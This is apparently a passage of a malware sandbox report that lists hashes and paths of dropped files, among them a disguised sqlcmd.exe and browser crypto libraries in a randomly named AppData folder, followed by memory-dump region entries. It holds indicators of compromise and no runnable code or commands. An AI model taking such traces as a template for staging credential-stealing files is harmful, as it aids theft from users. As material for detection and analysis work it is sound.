423c39c05e6542b80b279484a4eb22123aeaa2cbfa24c4c812df9c066c2d0e24
SHA512
eb2a7bfcbcbc6bfb70ba4040362504271236cd76fd2737723c65665a6fdd140385fb730b01619b1349f424d991ddb86dbada96b952454d86fd53167b7de07684
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
MD5
1770a0e98a4d78983f336eba64e859df
SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae
SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161
SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997
-
\Users\Admin\AppData\LocalLow\sqlite3.dll
MD5
f964811b68f9f1487c2b41e1aef576ce
SHA1
b423959793f14b1416bc3b7051bed58a1034025f
SHA256
83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512
565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll
MD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1
989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256
9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512
626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll
MD5
eae9273f8cdcf9321c6c37c244773139
SHA1
8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256
a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512
06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll
MD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1
a6923da95705fb81e368ae48f93d28522ef552fb
SHA256
1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512
0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll
MD5
4e8df049f3459fa94ab6ad387f3561ac
SHA1
06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256
25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512
3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
memory/492-122-0x0000000000000000-mapping.dmp
-
memory/492-128-0x00000000048E0000-0x0000000004973000-memory.dmp
Filesize
588KB
-
memory/492-129-0x0000000000400000-0x0000000002CB4000-memory.dmp
Filesize
40.7MB
-
memory/580-445-0x0000000000000000-mapping.dmp
-
memory/996-114-0x0000000000030000-0x0000000000039000-memory.dmp
Filesize
36KB
-
memory/996-169-0x0000000008200000-0x0000000008201000-memory.dmp
Filesize
4KB
-
memory/996-184-0x0000000001283000-0x0000000001284000-memory.dmp
Filesize
4KB
-
memory/996-166-0x00000000078C0000-0x00000000078C1000-memory.dmp
Filesize
4KB
-
memory/996-115-0x0000000000400000-0x0000000000902000-memory.dmp
Filesize
5.0MB
-
memory/996-156-0x0000000000000000-mapping.dmp
-
memory/996-185-0x0000000009360000-0x00000000094BB000-memory.dmp
Filesize
1.4MB
-
memory/996-178-0x00000000098D0000-0x00000000098D1000-memory.dmp
Filesize
4KB
-
memory/996-173-0x0000000001282000-0x0000000001283000-memory.dmp
Filesize
4KB
-
memory/996-172-0x0000000001280000-0x0000000001281000-memory.dmp
Filesize
4KB
-
memory/1332-120-0x0000000004780000-0x00000000047B9000-memory.dmp
Filesize
228KB
-
memory/1332-121-0x0000000000400000-0x0000000002C86000-memory.dmp
Filesize
40.5MB
-
memory/1332-117-0x0000000000000000-mapping.dmp
-
memory/1548-130-0x0000000000400000-0x0000000002C86000-memory.dmp
Filesize
40.5MB
-
memory/1548-125-0x0000000000000000-mapping.dmp
-
memory/2020-215-0x00000000097B0000-0x00000000097B1000-memory.dmp
Filesize
4KB
-
memory/2020-186-0x0000000000000000-mapping.dmp
-
memory/2020-421-0x0000000009CA0000-0x0000000009CA1000-memory.dmp
Filesize
4KB
-
memory/2020-415-0x0000000009CB0000-0x0000000009CB1000-memory.dmp
Filesize
4KB
-
memory/2020-245-0x0000000004F53000-0x0000000004F54000-memory.dmp
Filesize
4KB
-
memory/2020-220-0x0000000009A40000-0x0000000009A41000-memory.dmp
Filesize
4KB
-
memory/2020-213-0x000000007EEA0000-0x000000007EEA1000-memory.dmp
Filesize
4KB
-
memory/2020-207-0x00000000097D0000-0x0000000009803000-memory.dmp
Filesize
204KB
-
memory/2020-192-0x0000000004F52000-0x0000000004F53000-memory.dmp
Filesize
4KB
-
memory/2020-191-0x0000000004F50000-0x0000000004F51000-memory.dmp
Filesize
4KB
-
memory/2180-116-0x0000000001130000-0x0000000001146000-memory.dmp
Filesize
88KB
-
memory/2216-446-0x0000000000000000-mapping.dmp
-
memory/2304-442-0x0000000000000000-mapping.dmp
-
memory/2436-454-0x0000000000000000-mapping.dmp
-
memory/2644-447-0x0000000002C70000-0x0000000002DBA000-memory.dmp
Filesize
1.3MB
-
memory/2644-448-0x0000000000400000-0x0000000002C6A000-memory.dmp
Filesize
40.4MB
-
memory/2644-441-0x0000000000000000-mapping.dmp
-
memory/2648-440-0x0000000000000000-mapping.dmp
-
memory/3276-144-0x0000000008A30000-0x0000000008A31000-memory.dmp
Filesize
4KB
-
memory/3276-135-0x0000000007A70000-0x0000000007A71000-memory.dmp
Filesize
4KB
-
memory/3276-150-0x00000000096F0000-0x00000000096F1000-memory.dmp
Filesize
4KB
-
memory/3276-151-0x0000000009770000-0x0000000009771000-memory.dmp
Filesize
4KB
-
memory/3276-139-0x0000000008210000-0x0000000008211000-memory.dmp
Filesize
4KB
-
memory/3276-138-0x0000000007860000-0x0000000007861000-memory.dmp
Filesize
4KB
-
memory/3276-137-0x0000000004F72000-0x0000000004F73000-memory.dmp
Filesize
4KB
-
memory/3276-136-0x0000000004F70000-0x0000000004F71000-memory.dmp
Filesize
4KB
-
memory/3276-143-0x0000000008B00000-0x0000000008B01000-memory.dmp
Filesize
4KB
-
memory/3276-149-0x0000000009A40000-0x0000000009A41000-memory.dmp
Filesize
4KB
-
memory/3276-152-0x0000000009FE0000-0x0000000009FE1000-memory.dmp
Filesize
4KB
-
memory/3276-142-0x00000000085F0000-0x00000000085F1000-memory.dmp
Filesize
4KB
-
memory/3276-141-0x0000000008280000-0x0000000008281000-memory.dmp
Filesize
4KB
-
memory/3276-134-0x0000000004F20000-0x0000000004F21000-memory.dmp
Filesize
4KB
-
memory/3276-131-0x0000000000000000-mapping.dmp
-
memory/3276-170-0x0000000004F73000-0x0000000004F74000-memory.dmp
Filesize
4KB
-
memory/3276-140-0x0000000007A00000-0x0000000007A01000-memory.dmp
Filesize
4KB
-
memory/3632-453-0x0000000002FA0000-0x0000000002FA4000-memory.dmp
Filesize
16KB
-
memory/3632-455-0x0000000000400000-0x0000000002C6A000-memory.dmp
Filesize
40.4MB